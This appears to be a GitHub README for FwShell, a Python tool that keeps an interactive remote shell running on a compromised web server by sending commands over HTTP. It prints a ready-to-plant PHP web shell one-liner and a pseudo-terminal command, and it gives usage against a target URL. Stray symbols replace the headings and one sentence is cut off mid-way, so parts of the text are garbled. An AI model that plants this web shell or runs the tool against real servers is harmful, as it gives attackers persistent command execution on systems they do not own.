β
Description
β
β
Features
β
β
Usage
β
β
Contribution
β
This script establishes a remote shell session that allows the execution of commands on the server interactively, handling output and state dynamically. Since some servers don't allow to get
The remote server must be configured to allow command execution or simply get a PHP structure loaded on the compromised server.
<?php
system($_REQUEST['cmd']); # use too, $_GET
?>Take into account the path to the compromised server, where the bug or our PHP script is located.
-
Remotely execute commands: Sends shell commands to the remote server and receives the results in real time.
-
Interactive shell: Allows you to interact with the remote system similar to a local terminal.
-
Pseudo-terminal management: You can use a pseudo-terminal (script /dev/null -c /bin/bash) to keep the session interactive.
-
Command history management: The script keeps a history of the commands executed during the session.
-
Configurable execution intervals: The interval between command executions can be adjusted.
-
Session termination: At the end of the session, the scriptdeletes temporary files.
First download the code
git clone --no-checkout http://github.com/ch4rum/FwShell.gitTo run the script, you can use the following command:
python3 main.py -u <URL> -i <interval>-
-uo--url<URL> is the Url of the remote server. -
-io--interval<interval> is an optional parameter that sets the interval (in seconds) between command execution. If not specified, the default value is$0.5$ seconds.
To exit the session, you can run ctrl + c.
- Python 3
- Libraries:
requestsargparsereadlineostimesignalsysosthreadingbase64random
You can install the neccesary dependencies by running.
# In windows & some linux
pip install requests
# In Arch and some derivate
sudo pacman -S --noconfirm python-requestsIf you want to contribute to this little script, feel free to make a fork and send your improvements via pull requests.